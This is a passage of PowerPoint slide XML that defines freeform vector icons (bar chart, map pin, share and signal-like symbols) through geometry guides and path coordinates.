              <a:gd name="T39" fmla="*/ 41173 h 62"/>
              <a:gd name="T40" fmla="*/ 37788 w 61"/>
              <a:gd name="T41" fmla="*/ 92638 h 62"/>
              <a:gd name="T42" fmla="*/ 34352 w 61"/>
              <a:gd name="T43" fmla="*/ 96069 h 62"/>
              <a:gd name="T44" fmla="*/ 34352 w 61"/>
              <a:gd name="T45" fmla="*/ 99500 h 62"/>
              <a:gd name="T46" fmla="*/ 34352 w 61"/>
              <a:gd name="T47" fmla="*/ 116656 h 62"/>
              <a:gd name="T48" fmla="*/ 37788 w 61"/>
              <a:gd name="T49" fmla="*/ 120087 h 62"/>
              <a:gd name="T50" fmla="*/ 92752 w 61"/>
              <a:gd name="T51" fmla="*/ 174983 h 62"/>
              <a:gd name="T52" fmla="*/ 96187 w 61"/>
              <a:gd name="T53" fmla="*/ 178415 h 62"/>
              <a:gd name="T54" fmla="*/ 113363 w 61"/>
              <a:gd name="T55" fmla="*/ 178415 h 62"/>
              <a:gd name="T56" fmla="*/ 116798 w 61"/>
              <a:gd name="T57" fmla="*/ 174983 h 62"/>
              <a:gd name="T58" fmla="*/ 116798 w 61"/>
              <a:gd name="T59" fmla="*/ 171552 h 62"/>
              <a:gd name="T60" fmla="*/ 37788 w 61"/>
              <a:gd name="T61" fmla="*/ 92638 h 62"/>
              <a:gd name="T62" fmla="*/ 51529 w 61"/>
              <a:gd name="T63" fmla="*/ 144104 h 62"/>
              <a:gd name="T64" fmla="*/ 34352 w 61"/>
              <a:gd name="T65" fmla="*/ 161259 h 62"/>
              <a:gd name="T66" fmla="*/ 51529 w 61"/>
              <a:gd name="T67" fmla="*/ 178415 h 62"/>
              <a:gd name="T68" fmla="*/ 68705 w 61"/>
              <a:gd name="T69" fmla="*/ 161259 h 62"/>
              <a:gd name="T70" fmla="*/ 51529 w 61"/>
              <a:gd name="T71" fmla="*/ 144104 h 6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11" y="12"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11" y="12"/>
                  <a:pt x="11" y="12"/>
                  <a:pt x="10" y="12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9"/>
                  <a:pt x="11" y="20"/>
                  <a:pt x="11" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="20"/>
                  <a:pt x="42" y="34"/>
                  <a:pt x="42" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42" y="51"/>
                  <a:pt x="43" y="52"/>
                  <a:pt x="43" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="52"/>
                  <a:pt x="49" y="52"/>
                  <a:pt x="49" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="52"/>
                  <a:pt x="49" y="52"/>
                  <a:pt x="49" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="51"/>
                  <a:pt x="50" y="51"/>
                  <a:pt x="50" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="30"/>
                  <a:pt x="32" y="13"/>
                  <a:pt x="11" y="12"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11" y="27"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11" y="27"/>
                  <a:pt x="11" y="28"/>
                  <a:pt x="10" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10" y="28"/>
                  <a:pt x="10" y="28"/>
                  <a:pt x="10" y="29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35"/>
                  <a:pt x="11" y="35"/>
                  <a:pt x="11" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="36"/>
                  <a:pt x="26" y="42"/>
                  <a:pt x="27" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="51"/>
                  <a:pt x="27" y="52"/>
                  <a:pt x="28" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="52"/>
                  <a:pt x="33" y="52"/>
                  <a:pt x="33" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="33" y="52"/>
                  <a:pt x="34" y="52"/>
                  <a:pt x="34" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="51"/>
                  <a:pt x="34" y="51"/>
                  <a:pt x="34" y="50"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="38"/>
                  <a:pt x="24" y="28"/>
                  <a:pt x="11" y="27"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15" y="42"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="42"/>
                  <a:pt x="10" y="44"/>
                  <a:pt x="10" y="47"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10" y="50"/>
                  <a:pt x="12" y="52"/>
                  <a:pt x="15" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="52"/>
                  <a:pt x="20" y="50"/>
                  <a:pt x="20" y="47"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="44"/>
                  <a:pt x="18" y="42"/>
                  <a:pt x="15" y="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88" name="Freeform 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C62D9BE2-4C7B-402B-A931-74C5694F7E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6312906" y="3636309"/>
            <a:ext cx="203133" cy="167514"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 253546 w 168"/>
              <a:gd name="T1" fmla="*/ 247650 h 152"/>
              <a:gd name="T2" fmla="*/ 234043 w 168"/>
              <a:gd name="T3" fmla="*/ 228099 h 152"/>
              <a:gd name="T4" fmla="*/ 234043 w 168"/>
              <a:gd name="T5" fmla="*/ 19551 h 152"/>
              <a:gd name="T6" fmla="*/ 253546 w 168"/>
              <a:gd name="T7" fmla="*/ 0 h 152"/>
              <a:gd name="T8" fmla="*/ 273050 w 168"/>
              <a:gd name="T9" fmla="*/ 19551 h 152"/>
              <a:gd name="T10" fmla="*/ 273050 w 168"/>
              <a:gd name="T11" fmla="*/ 228099 h 152"/>
              <a:gd name="T12" fmla="*/ 253546 w 168"/>
              <a:gd name="T13" fmla="*/ 247650 h 152"/>
              <a:gd name="T14" fmla="*/ 175532 w 168"/>
              <a:gd name="T15" fmla="*/ 247650 h 152"/>
              <a:gd name="T16" fmla="*/ 156029 w 168"/>
              <a:gd name="T17" fmla="*/ 228099 h 152"/>
              <a:gd name="T18" fmla="*/ 156029 w 168"/>
              <a:gd name="T19" fmla="*/ 71688 h 152"/>
              <a:gd name="T20" fmla="*/ 175532 w 168"/>
              <a:gd name="T21" fmla="*/ 52137 h 152"/>
              <a:gd name="T22" fmla="*/ 195036 w 168"/>
              <a:gd name="T23" fmla="*/ 71688 h 152"/>
              <a:gd name="T24" fmla="*/ 195036 w 168"/>
              <a:gd name="T25" fmla="*/ 228099 h 152"/>
              <a:gd name="T26" fmla="*/ 175532 w 168"/>
              <a:gd name="T27" fmla="*/ 247650 h 152"/>
              <a:gd name="T28" fmla="*/ 97518 w 168"/>
              <a:gd name="T29" fmla="*/ 247650 h 152"/>
              <a:gd name="T30" fmla="*/ 78014 w 168"/>
              <a:gd name="T31" fmla="*/ 228099 h 152"/>
              <a:gd name="T32" fmla="*/ 78014 w 168"/>
              <a:gd name="T33" fmla="*/ 123825 h 152"/>
              <a:gd name="T34" fmla="*/ 97518 w 168"/>
              <a:gd name="T35" fmla="*/ 104274 h 152"/>
              <a:gd name="T36" fmla="*/ 117021 w 168"/>
              <a:gd name="T37" fmla="*/ 123825 h 152"/>
              <a:gd name="T38" fmla="*/ 117021 w 168"/>
              <a:gd name="T39" fmla="*/ 228099 h 152"/>
              <a:gd name="T40" fmla="*/ 97518 w 168"/>
              <a:gd name="T41" fmla="*/ 247650 h 152"/>
              <a:gd name="T42" fmla="*/ 19504 w 168"/>
              <a:gd name="T43" fmla="*/ 247650 h 152"/>
              <a:gd name="T44" fmla="*/ 0 w 168"/>
              <a:gd name="T45" fmla="*/ 228099 h 152"/>
              <a:gd name="T46" fmla="*/ 0 w 168"/>
              <a:gd name="T47" fmla="*/ 175962 h 152"/>
              <a:gd name="T48" fmla="*/ 19504 w 168"/>
              <a:gd name="T49" fmla="*/ 156411 h 152"/>
              <a:gd name="T50" fmla="*/ 39007 w 168"/>
              <a:gd name="T51" fmla="*/ 175962 h 152"/>
              <a:gd name="T52" fmla="*/ 39007 w 168"/>
              <a:gd name="T53" fmla="*/ 228099 h 152"/>
              <a:gd name="T54" fmla="*/ 19504 w 168"/>
              <a:gd name="T55" fmla="*/ 247650 h 15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168" h="152">
                <a:moveTo>
                  <a:pt x="156" y="152"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="149" y="152"/>
                  <a:pt x="144" y="147"/>
                  <a:pt x="144" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="12"/>
                  <a:pt x="144" y="12"/>
                  <a:pt x="144" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="5"/>
                  <a:pt x="149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40"/>
                  <a:pt x="168" y="140"/>
                  <a:pt x="168" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="147"/>
                  <a:pt x="163" y="152"/>
                  <a:pt x="156" y="152"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="108" y="152"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="101" y="152"/>
                  <a:pt x="96" y="147"/>
                  <a:pt x="96" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96" y="44"/>
                  <a:pt x="96" y="44"/>
                  <a:pt x="96" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96" y="37"/>
                  <a:pt x="101" y="32"/>
                  <a:pt x="108" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="32"/>
                  <a:pt x="120" y="37"/>
                  <a:pt x="120" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120" y="140"/>
                  <a:pt x="120" y="140"/>
                  <a:pt x="120" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120" y="147"/>
                  <a:pt x="115" y="152"/>
                  <a:pt x="108" y="152"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="60" y="152"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="152"/>
                  <a:pt x="48" y="147"/>
                  <a:pt x="48" y="140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67" y="64"/>
                  <a:pt x="72" y="69"/>
                  <a:pt x="72" y="76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72" y="147"/>
                  <a:pt x="67" y="152"/>
                  <a:pt x="60" y="152"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12" y="152"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="152"/>
                  <a:pt x="0" y="147"/>
                  <a:pt x="0" y="140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7"/>
                  <a:pt x="19" y="152"/>
                  <a:pt x="12" y="152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89" name="Freeform 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E04AC0BD-C5EB-4C05-9220-412EF9AF818F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7045766" y="3836438"/>
            <a:ext cx="173078" cy="250506"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="98" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="60" y="7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="29" y="27"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="7" y="59"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="98"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="116"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="9" y="154"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="31" y="208"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="67" y="270"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="98" y="311"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="112" y="291"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="147" y="241"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="180" y="172"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="190" y="134"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="196" y="98"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="194" y="78"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="178" y="41"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="152" y="16"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="118" y="1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="98" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="98" y="157"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="74" y="152"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="54" y="139"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="42" y="119"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="38" y="98"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="38" y="85"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="47" y="63"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="64" y="47"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="85" y="38"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="98" y="36"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="122" y="41"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="140" y="54"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="152" y="74"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="158" y="98"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="156" y="108"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="147" y="130"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="131" y="146"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="109" y="156"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="98" y="157"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="60" y="98"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="62" y="112"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="71" y="123"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="83" y="132"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="98" y="134"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="105" y="134"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="118" y="128"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="129" y="117"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="134" y="105"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="136" y="98"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="132" y="81"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="125" y="70"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="112" y="61"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="98" y="59"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="89" y="59"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="76" y="65"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="65" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="60" y="88"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="60" y="98"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="196" h="311">
                <a:moveTo>
                  <a:pt x="98" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="98" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165" y="208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="98" y="157"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="98" y="157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54" y="139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156" y="108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147" y="130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140" y="139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="157"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="60" y="98"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="60" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="9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2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Freeform 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{645A460C-56AB-46B2-A542-1F39E123E7BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6042293" y="4699057"/>
            <a:ext cx="250786" cy="256929"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="230" y="212"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="212" y="216"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="197" y="223"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="105" y="169"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="105" y="160"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="197" y="96"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="204" y="100"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="221" y="105"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="230" y="107"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="250" y="102"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="266" y="91"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="277" y="75"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="282" y="53"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="281" y="44"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="273" y="24"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="259" y="9"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="239" y="2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="230" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="208" y="4"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="192" y="17"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="181" y="33"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="175" y="53"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="177" y="62"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="85" y="118"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="68" y="109"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="52" y="107"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="41" y="107"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="23" y="116"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="9" y="131"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="149"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="160"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="3" y="180"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="14" y="198"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="30" y="209"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="52" y="212"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="61" y="212"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="78" y="207"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="177" y="258"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="175" y="267"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="177" y="278"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="184" y="296"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="199" y="310"/>
              </a:cxn>
